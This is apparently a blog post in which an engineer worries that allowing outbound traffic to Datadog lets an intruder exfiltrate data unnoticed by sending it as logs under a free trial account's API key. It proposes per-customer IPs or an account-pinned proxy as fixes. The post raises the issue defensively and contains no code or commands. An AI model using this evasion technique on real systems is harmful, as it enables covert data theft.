In my current job, we are evaluating Datadog as the repository for the metrics and logs being generated by our SaaS application, which is hosted in AWS.
We have taken a security-first approach in our design for the AWS accounts and infrastructure surrounding our app, which means among other things that we are not allowing any of our EC2 instances unfettered outbound access to the internet. Instead, we are specifically whitelisting the services and ports to which our instances can connect.
There are three reasons to have a default-deny policy for outbound network connections:
- Prevent the third-party code running on our servers from connecting to anything without or knowledge.
- Preventing malware trying to gain a toehold on one of our servers from communicating with command-and-control servers.
- Making it harder for bad actors (human or software) to exfiltrate data from our servers.
Unfortunately, Datadog makes this hard.
The Datadog servers, to which their agent running on our servers needs to connect, have multiple IP addresses which could change at any time, making it difficult to use IP whitelisting to allow our servers to connect to them.
Datadog’s recommendation for how to address this is for us to deploy a proxy server such as Squid or HAProxy in our environment, allow that proxy to have outbound access to the internet on the necessary ports, and then to route Datadog traffic through the proxy. This solves the specific problem of how to get data from our servers to Datadog.
However, as far as I can tell, neither whitelisting Datadog’s IPs (if that were possible) nor routing Datadog traffic through a proxy solves a larger problem: if we provide a conduit for outbound connections to Datadog from our servers, then any outbound Datadog connections, even connections for a different Datadog account, can use that conduit.
In other words, I believe that allowing outbound connections to Datadog allows anyone who compromises any of our servers to exfiltrate any data they want through Datadog, simply by (a) creating a free Datadog trial account and (b) sending the data as logs to Datadog using their trial account’s API key.
Furthermore, this data exfiltration would be nearly undetectable, since it would be going to servers we expect our servers to be sending data to, on ports we expect them to be sending data on.
At least one of Datadog’s competitors addresses this by assigning known, static IP addresses and ports to specific customers, such that any data sent to one of the assigned address/port pairs is guaranteed to go into a specific customer’s account. Customers can then whitelist only those specific IP addresses and ports in their outbound firewall rules. Datadog could perhaps use a similar approach, assigning dedicated IPs to specific customers, presumably for a fee.
Another way to solve this problem would be for Datadog to provide its own, custom proxy which pegs the traffic passing through it to a single Datadog account. Using the proxy to exfiltrate data into a different Datadog account would then be impossible.
I’m writing about this here because when it occurred to me that it was an issue I did a bit of digging around the net trying to find out if anyone else had already written about it, and I couldn’t find anything. If you know of someone else having written about this, please post a comment below or email me.
Am I missing something here which makes this concern specious? Let me know in the comments if you think so.